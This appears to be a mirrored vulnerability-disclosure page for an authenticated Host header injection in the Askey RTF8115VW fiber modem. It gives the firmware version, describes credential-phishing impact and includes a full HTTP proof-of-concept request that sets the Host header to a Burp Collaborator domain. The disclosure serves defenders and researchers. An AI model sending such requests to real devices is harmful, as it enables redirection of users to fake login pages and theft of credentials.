关联漏洞
Description
HostHeaderInjection-Askey
介绍
**Authenticated Host Header Injection - Askey Internet Fiber Modem**
Vendor: **Askey**
Software Version: **BR_SV_g11.11_RTF_TEF001_V6.54_V014**
Model: **RTF8115VW**
Vulnerable Header: **Host**
Not tested in other model/version.
Impact: An attacker could take advantege on that vulnerability to redirect user to a fake Login page in order to extract his credentials, or cookies.
The Final Request
```
GET / HTTP/1.1
Host: kay4tb35bh55y38n8h4teim21t7jv8.burpcollaborator.net
Cookie: _httpdSessionId_=7924107467ea5838a196b65306ca7236
Upgrade-Insecure-Requests: 1
Referer: http://x.x.x.x/cgi-bin/te_logout.cgi
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
```
文件快照
[4.0K] /data/pocs/9d95d73cf449508839adaf4ed523630747da4ea7
├── [161K] hostHeaderInjection.jpg
└── [ 955] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。